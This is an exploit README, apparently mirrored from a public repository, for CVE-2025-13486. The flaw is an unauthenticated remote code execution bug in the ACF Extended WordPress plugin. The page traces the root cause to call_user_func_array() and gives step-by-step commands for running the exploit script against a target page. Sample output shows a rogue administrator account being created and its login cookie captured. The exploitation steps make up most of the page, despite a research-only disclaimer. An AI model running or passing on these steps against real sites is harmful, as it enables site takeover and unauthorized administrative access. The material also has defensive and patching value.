Share
## https://sploitus.com/exploit?id=0355D436-1666-57CF-80F3-F0D25AC8C3D6
# CVE-2025-13486 exploit

### ACF Extended WordPress Plugin โ€” Remote Code Execution & Privilege Escalation

Exploit for the CVE-2025-13486 discovered by [Marcin Dudek (dudekmar)](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dudekmar)

### โš ๏ธ Disclaimer

This repository is provided for **research and defensive security purposes only**.
The author assumes no responsibility for misuse of this information.

---

## ๐Ÿ“Œ Overview

The **Advanced Custom Fields: Extended (ACFE)** plugin for WordPress is vulnerable to **Remote Code Execution (RCE)** in versions **0.9.0.5 through 0.9.1.1**.

The vulnerability exists in the `prepare_form()` function, which accepts user-controlled input and forwards it to `call_user_func_array()` without proper validation.

This allows **unauthenticated attackers** to execute arbitrary PHP code on the server in a limited manner, which is nonetheless sufficient to **create an administrator account** and log in.

---

## ๐Ÿ”ฌ Root Cause Analysis

The vulnerability chain is as follows:

1. **`includes/modules/form/module-form-front.php:24`** -> `wp_ajax_nopriv_acfe/form/render_form_ajax` action triggers the `render_form_ajax` handler.

2. **`includes/modules/form/module-form-front.php:492`** -> The filter `acfe/form/prepare_form` is applied, invoking the `prepare_form()` function.

3. **`includes/modules/form/module-form-front-render.php:151`** -> User-controlled `$form` data is passed directly to `call_user_func_array()`.

---

## ๐ŸŽฏ Exploitation

0. Install python dependencies:

	```bash
	python3 -m venv venv
	venv/bin/pip install -r requirements.txt
	```

1. Identify a vulnerable WordPress target.

	The target **must contain a page with an ACFE-generated form**.

	```bash
	venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
	```

	Output example:

	```
	[2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
	[2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
	```

2. Run the script again with the `--exploit` flag:

	```bash
	venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
	```

	Output example:

	```
	[2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
	[2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
	[2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
	[2025-12-19] [11:00:14] [success] Authentication succeded!
	[2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
	```

3. Use the returned WordPress authentication cookie to log in as the newly created administrator account.

---

## ๐Ÿ“š References

* https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
* https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution-in-prepare-form
* https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82